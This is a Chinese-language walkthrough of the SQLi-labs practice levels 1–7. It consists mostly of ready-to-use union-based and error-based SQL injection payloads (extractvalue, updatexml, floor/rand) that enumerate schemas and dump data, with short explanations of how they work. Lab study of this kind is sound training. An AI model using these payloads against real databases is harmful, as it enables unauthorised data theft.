SQLI—LABS刷题 | SQL总结

Less1-2（联合注入）

?id=1
查询到用户名及密码

?id='1
报错：You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1 LIMIT 0,1' at line 1确定为MariaDB（与mysql几乎一样），且注入点为数字型

?id=1 order by 4 --+ 
测列数，--+将后面的语句隔断
order by 3时不报错，说明有3列

?id=-1 union select 1,2,3 --+ 爆出显位

原理：

union select之前的语句查询不到结果时，查询结果会变为1 2 3

在显位上查询相关信息
?id=-1 union select 1,database(),@@version --+

根据information_schema找数据库-表-列

1.从schemata里找数据库名schema_name

?id=-1%20union%20select%201,database(),group_concat(schema_name)%20from%20information_schema.schemata--+

2.从tables里找表名

?id=-1 union select 1,2,group_concat( table_name) from information_schema.tables where table_schema='security' --+

3.从columns里找列名

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security'and table_name='users'--+

4.有表名，有列名，直接查

BUUCTF的flag在ctftraining数据库下的flag表flag列

Less3

通过加单引号查看报错，发现注入点为字符型且被包在括号中。所以要闭合引号和括号

?id=-1') union select 1,2,group_concat(column_name) from…… --+

Less4

这次是双引号加括号闭合

Less5（报错注入）

无回显，联合查询失效，只能通过报错来显示信息

1.XPATH语法错误——extractvalue

查数据库名：id='and(select extractvalue(1,concat(0x7e,(select database()))))
爆表名：id='and(select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))))
爆字段名：id='and(select extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="TABLE_NAME"))))
爆数据：id='and(select extractvalue(1,concat(0x7e,(select group_concat(COIUMN_NAME) from TABLE_NAME))))

2.XPATH语法错误——updatexml

爆数据库名：'and(select updatexml(1,concat(0x7e,(select database())),0x7e))
爆表名：'and(select updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database())),0x7e))
爆列名：'and(select updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name="TABLE_NAME")),0x7e))
爆数据：'and(select updatexml(1,concat(0x7e,(select group_concat(COLUMN_NAME)from TABLE_NAME)),0x7e))

3.concat+rand()+group_by()导致主键重复（表至少有3行才能用）

爆数据库名：'union select 1 from (select count(*),concat((select database())," ",floor(rand(0)*2))x from information_schema.tables group by x)a
爆表名：'union select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 0,1) ," ",floor(rand(0)*2))x from information_schema.tables group by x)a
爆列名：'union select 1 from (select count(*),concat((select column_name from information_schema.columns where table_name="TABLE_NAME" limit 0,1) ," ",floor(rand(0)*2))x from information_schema.tables group by x)a
爆数据：'union select 1 from (select count(*),concat((select COLUMN_NAME from TABLE_NAME limit 0,1) ," ",floor(rand(0)*2))x from information_schema.tables group by x)a

原理：floor(rand(0)*2)得出一串重复的数字011011……，count(*)时，会构建一个 |值|出现次数| 的虚表。遇到0，表中没有，要把0插入，而此时rand会再次计算，导致值变为1了，所以1插入。第三条值是一，直接加1，第四条是0，表中没有，要插入，而此时又重新计算，导致插入1，而1已经出现过了，导致主键重复报错，错误信息会将查询结果显示出来
参考：关于floor()报错注入，你真的懂了吗？- FreeBuf
MYSQL报错注入的一点总结 - 先知社区 (aliyun.com)
sql注入之报错注入-CSDN博客

4.报错显示不全

最多只能显示32个字符，通过mid函数来分段查看

?id=%27and(select%20updatexml(1,mid(concat(0x7e,(select%20group_concat(flag)from%20ctftraining.flag)),1,32),0x7e))--+

Less-6 Double Query- Double Quotes- String (buuoj.cn)

Less6

双引号闭合

?id="-1 and(select extractvalue(1,mid(concat(0x7e,(select group_concat(flag) from ctftraining.flag)),32,45)))--+

Less7

into outfile语句用于将文件导入或导出

利用条件：

具有root权限
在数据库配置文件中的配置项含有：secure_file_priv=
指定目录：secure_file_priv=/path/to/data，只能上传文件到此目录
不限目录：secure_file_priv=
禁止操作：secure_file_priv=NULL
Mysql中输入 SHOW VARIABLES LIKE "secure_file_priv"; 查看
知道数据库的绝对路径。